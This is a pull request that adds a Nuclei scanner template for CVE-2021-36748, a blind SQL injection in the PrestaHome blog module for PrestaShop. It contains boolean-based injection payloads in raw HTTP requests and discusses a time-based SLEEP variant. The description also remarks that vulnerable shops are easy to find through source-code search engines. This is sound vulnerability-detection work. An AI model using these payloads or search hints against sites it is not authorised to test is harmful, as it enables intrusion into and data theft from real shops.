### PR TITLE
Create CVE-2021-36748.yaml

### DIFF
--- a/cves/2021/CVE-2021-36748.yaml
+++ b/cves/2021/CVE-2021-36748.yaml
@@ -12,19 +12,19 @@ info:
 
 requests:
     - raw:
-      - |
-        GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+        - |
+          GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1
+          Host: {{Hostname}}
+          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 
-      - |
-        GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+        - |
+          GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1
+          Host: {{Hostname}}
+          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 
-      req-condition: true
+        req-condition: true
 
-      matchers:
-        - type: dsl
-          dsl:
-            - "status_code_1 == 200 && status_code_2 == 404 && len(body_1) > 0 && len(body_2) == 0"
+        matchers:
+          - type: dsl
+            dsl:
+              - "status_code_1 == 200 && status_code_2 == 404 && len(body_1) > 0 && len(body_2) == 0"

--- a/cves/2021/CVE-2021-36748.yaml
+++ b/cves/2021/CVE-2021-36748.yaml
@@ -1,0 +1,30 @@
+id: CVE-2021-36748
+
+info:
+    name: PrestaHome Blog for PrestaShop - SQL Injection
+    author: whoever
+    severity: high
+    description: Blog for PrestaShop by PrestaHome < 1.7.8 is vulnerable to a SQL injection via sb_category parameter.
+    tags: cve2021,prestashop,prestahome,sqli
+    reference: |
+      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36748
+      https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
+
+requests:
+    - raw:
+      - |
+        GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+
+      - |
+        GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+
+      req-condition: true
+
+      matchers:
+        - type: dsl
+          dsl:
+            - "status_code_1 == 200 && status_code_2 == 404 && len(body_1) > 0 && len(body_2) == 0"

--- a/cves/2021/CVE-2021-36748.yaml
+++ b/cves/2021/CVE-2021-36748.yaml
@@ -11,20 +11,19 @@ info:
       https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
 
 requests:
-    - raw:
-        - |
-          GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1
-          Host: {{Hostname}}
-          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+  - raw:
+      - |
+        GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 
-        - |
-          GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1
-          Host: {{Hostname}}
-          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+      - |
+        GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 
-        req-condition: true
-
-        matchers:
-          - type: dsl
-            dsl:
-              - "status_code_1 == 200 && status_code_2 == 404 && len(body_1) > 0 && len(body_2) == 0"
+      req-condition: true
+      matchers:
+        - type: dsl
+          dsl:
+            - "status_code_1 == 200 && status_code_2 == 404 && len(body_1) > 0 && len(body_2) == 0"

--- a/cves/2021/CVE-2021-36748.yaml
+++ b/cves/2021/CVE-2021-36748.yaml
@@ -1,14 +1,14 @@
 id: CVE-2021-36748
 
 info:
-    name: PrestaHome Blog for PrestaShop - SQL Injection
-    author: whoever
-    severity: high
-    description: Blog for PrestaShop by PrestaHome < 1.7.8 is vulnerable to a SQL injection via sb_category parameter.
-    tags: cve2021,prestashop,prestahome,sqli
-    reference: |
-      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36748
-      https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
+  name: PrestaHome Blog for PrestaShop - SQL Injection
+  author: whoever
+  severity: high
+  description: Blog for PrestaShop by PrestaHome < 1.7.8 is vulnerable to a SQL injection via sb_category parameter.
+  tags: cve2021,prestashop,prestahome,sqli
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36748
+    - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
 
 requests:
   - raw:
@@ -22,8 +22,8 @@ requests:
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 
-      req-condition: true
-      matchers:
-        - type: dsl
-          dsl:
-            - "status_code_1 == 200 && status_code_2 == 404 && len(body_1) > 0 && len(body_2) == 0"
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200 && status_code_2 == 404 && len(body_1) > 0 && len(body_2) == 0"

--- a/cves/2021/CVE-2021-36748.yaml
+++ b/cves/2021/CVE-2021-36748.yaml
@@ -5,7 +5,7 @@ info:
   author: whoever
   severity: high
   description: Blog for PrestaShop by PrestaHome < 1.7.8 is vulnerable to a SQL injection via sb_category parameter.
-  tags: cve2021,prestashop,prestahome,sqli
+  tags: cve,cve2021,prestashop,prestahome,sqli
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36748
     - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
@@ -15,15 +15,19 @@ requests:
       - |
         GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 
       - |
         GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 
     req-condition: true
     matchers:
       - type: dsl
         dsl:
-          - "status_code_1 == 200 && status_code_2 == 404 && len(body_1) > 0 && len(body_2) == 0"
+          - "status_code_1 == 200"
+          - 'contains(body_1, "prestashop")'
+          - "len(body_1) > 0"
+          - "status_code_2 == 404"
+          - "len(body_2) == 0"
+          - "contains(tolower(all_headers_2), 'index.php?controller=404')"
+        condition: and

--- a/cves/2021/CVE-2021-36748.yaml
+++ b/cves/2021/CVE-2021-36748.yaml
@@ -4,10 +4,10 @@ info:
   name: PrestaHome Blog for PrestaShop - SQL Injection
   author: whoever
   severity: high
-  description: Blog for PrestaShop by PrestaHome < 1.7.8 is vulnerable to a SQL injection via sb_category parameter.
-  tags: cve,cve2021,prestashop,prestahome,sqli
+  description: Blog for PrestaShop by PrestaHome < 1.7.8 is vulnerable to a SQL injection (blind) via sb_category parameter.
+  tags: cve,cve2021,prestashop,prestahome,sqli,cms
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36748
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-36748
     - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
 
 requests:
@@ -25,9 +25,8 @@ requests:
       - type: dsl
         dsl:
           - "status_code_1 == 200"
-          - 'contains(body_1, "prestashop")'
-          - "len(body_1) > 0"
           - "status_code_2 == 404"
-          - "len(body_2) == 0"
+          - 'contains(body_1, "prestashop")'
           - "contains(tolower(all_headers_2), 'index.php?controller=404')"
+          - "len(body_2) == 0"
         condition: and


### PR DESCRIPTION
### Template / PR Information

Blog for PrestaShop by PrestaHome up until version 1.7.7 is vulnerable to SQL injections.
Vulnerable path: /module/ph_simpleblog/list?sb_category=<injection>

It doesn't seem like data can be reflected with a `UNION SELECT` and due to a special way the plugin or shop system seems to react to an empty result caused by a `AND false` injection in the `WHERE` clause, I figured this might be faster than a time-based detection.

From by observation while creating the template with example pages, requesting the normal site by showing all categories via `OR true-- -` returns a 200 with some content or an information that there are no posts and not returning any data by using `AND false` results in an entirely empty 404 response. Combining all these aspects into the need of an 200 vs. a 404 and a existent body vs. an empty body should be a solid detection. We could go time-based though. It takes 4 times the `SLEEP` value, so 5 takes about 20 seconds, 3 takes about 12 seconds.

If I may ask a question while someone with more in-depth knowledge about Nuclei is reading this:
Is there a way to dump DSL aspects? Like if my DSL doesn't match for some reason, it would be nice to have some kind of a debug mode that tells me about `status_code_1`, `status_code_2` and the other values. In the best case it even detects the parts that don't match. Maybe not just for DSL matchers but for any matcher so I know what exactly has been done and returned to debug why things don't work, -v only gives the request path. This is also how I found out why I seemingly need to use raw requests for this simple task. There was a double `//` if the input target has a trailing `/`, which caused the application to respond differently, it seems to be important to have the exact path and using trimright doesn't work in normal requests to remove a possible trailing slash if I'm not mistaken. (Just as documentation and information for people that might read this in the future: This is BS. I was using an older Nuclei version, the behaviour was changed over time.)

Please feel free to correct me if I am wrong about any of my information, I'm also open to a time-based detection as explained above.

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

You can easily find vulnerable pages by searching for "modules/ph_simpleblog/" in website source code search engines. Basically all of them are vulnerable. I literally can't find a secure one which is bad for a double verification. Even the demo shop from the vendor is still vulnerable.

### Additional References:

- [CVE-2021-36748](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36748)
- [Writeup by pentester](https://blog.sorcery.ie/posts/ph_simpleblog_sqli/)